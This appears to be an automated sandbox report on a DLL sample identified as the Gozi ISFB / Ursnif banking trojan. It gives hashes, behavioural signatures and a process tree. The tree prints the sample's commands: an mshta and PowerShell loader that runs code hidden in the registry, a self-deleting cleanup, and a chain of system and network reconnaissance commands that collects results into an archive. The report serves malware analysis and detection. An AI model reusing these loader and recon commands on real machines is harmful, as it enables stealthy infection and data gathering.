Overview

overview

10

Static

static

u271020tar.dll

windows7_x64

10

u271020tar.dll

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    113s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 15:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    u271020tar.dll

  • Size

    352KB

  • MD5

    d800d8db5cb2ecc22899dcf7e1c2430d

  • SHA1

    24a64c88075907a3f01bfdc68ef3044c13f25296

  • SHA256

    84c7bba059b9d495d9e923346510a67a062b20d17c90d806fbf8cb6b67d91363

  • SHA512

    39bfb1567d32b177b27627fc76fc5410ebd6009ed972f7b044eae034746311d603ba67b7e1e51d374b34b788a5ccccf7849f2b7169c6184ba180d609cc646aa8

Score
10/10
gozi_ifsbursnifbankerspywaretrojan

Malware Config

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • ServiceHost packer 1 IoCs

    Detects ServiceHost packer used for .NET malware

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of SetThreadContext 7 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1260 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 104 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4008
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3876
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\0F48D51C-2296-191F-A4B3-765D18970AE1\\\Audients'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\0F48D51C-2296-191F-A4B3-765D18970AE1").AdmTdeui))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtnrgd4y\qtnrgd4y.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:888
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39FC.tmp" "c:\Users\Admin\AppData\Local\Temp\qtnrgd4y\CSC73648D81FE4048F79E82FBFAE66238.TMP"
            5⤵
              PID:1572
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uoxlzjkv\uoxlzjkv.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1948
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AC8.tmp" "c:\Users\Admin\AppData\Local\Temp\uoxlzjkv\CSCB4C8A1FD9F904BA6B3527E5BA83C2E8E.TMP"
              5⤵
                PID:2144
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\u271020tar.dll"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2636
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:480
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:3916
          • C:\Windows\system32\cmd.exe
            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\13B4.bi1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:2280
            • C:\Windows\system32\cmd.exe
              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\13B4.bi1"
              2⤵
                PID:2024
              • C:\Windows\system32\cmd.exe
                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"
                2⤵
                  PID:1412
                • C:\Windows\system32\cmd.exe
                  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1316
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo.exe
                    3⤵
                    • Gathers system information
                    PID:1572
                • C:\Program Files\Windows Mail\WinMail.exe
                  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                  2⤵
                    PID:736
                  • C:\Windows\syswow64\cmd.exe
                    "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                    2⤵
                      PID:1352
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                      2⤵
                        PID:396
                      • C:\Windows\system32\cmd.exe
                        cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                        2⤵
                          PID:2632
                          • C:\Windows\system32\net.exe
                            net view
                            3⤵
                            • Discovers systems in the same network
                            PID:1500
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                          2⤵
                            PID:3888
                          • C:\Windows\system32\cmd.exe
                            cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                            2⤵
                              PID:2568
                              • C:\Windows\system32\nslookup.exe
                                nslookup 127.0.0.1
                                3⤵
                                  PID:636
                              • C:\Windows\system32\cmd.exe
                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                2⤵
                                  PID:3396
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                  2⤵
                                    PID:3780
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist.exe /SVC
                                      3⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1412
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                    2⤵
                                      PID:2564
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                      2⤵
                                        PID:2056
                                        • C:\Windows\system32\driverquery.exe
                                          driverquery.exe
                                          3⤵
                                            PID:3916
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                          2⤵
                                            PID:2632
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                            2⤵
                                              PID:1028
                                              • C:\Windows\system32\reg.exe
                                                reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                                3⤵
                                                  PID:2568
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                                2⤵
                                                  PID:2000
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\A3D5.bin1 > C:\Users\Admin\AppData\Local\Temp\A3D5.bin & del C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"
                                                  2⤵
                                                    PID:2624
                                                  • C:\Windows\system32\makecab.exe
                                                    makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\92AE.bin"
                                                    2⤵
                                                      PID:1412
                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                    1⤵
                                                      PID:3516
                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                      1⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SetWindowsHookEx
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3792
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82945 /prefetch:2
                                                        2⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3716
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82951 /prefetch:2
                                                        2⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:1852

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • memory/1352-60-0x0000000000F96CD0-0x0000000000F96CD4-memory.dmp

                                                      Filesize

                                                      4B

                                                      Download

                                                    • memory/2136-34-0x0000015795AC0000-0x0000015795B5A000-memory.dmp

                                                      Filesize

                                                      616KB

                                                      Download

                                                    • memory/2152-6-0x00007FF9C3EF0000-0x00007FF9C48DC000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                      Download

                                                    • memory/2152-25-0x000001C57A4B0000-0x000001C57A54A000-memory.dmp

                                                      Filesize

                                                      616KB

                                                      Download

                                                    • memory/2152-24-0x000001C579300000-0x000001C579301000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2152-7-0x000001C5772C0000-0x000001C5772C1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2152-16-0x000001C5792E0000-0x000001C5792E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2152-8-0x000001C579DF0000-0x000001C579DF1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3000-27-0x0000000003330000-0x00000000033CA000-memory.dmp

                                                      Filesize

                                                      616KB

                                                      Download

                                                    • memory/3000-29-0x0000000003330000-0x00000000033CA000-memory.dmp

                                                      Filesize

                                                      616KB

                                                      Download

                                                    • memory/3000-31-0x0000000003330000-0x00000000033CA000-memory.dmp

                                                      Filesize

                                                      616KB

                                                      Download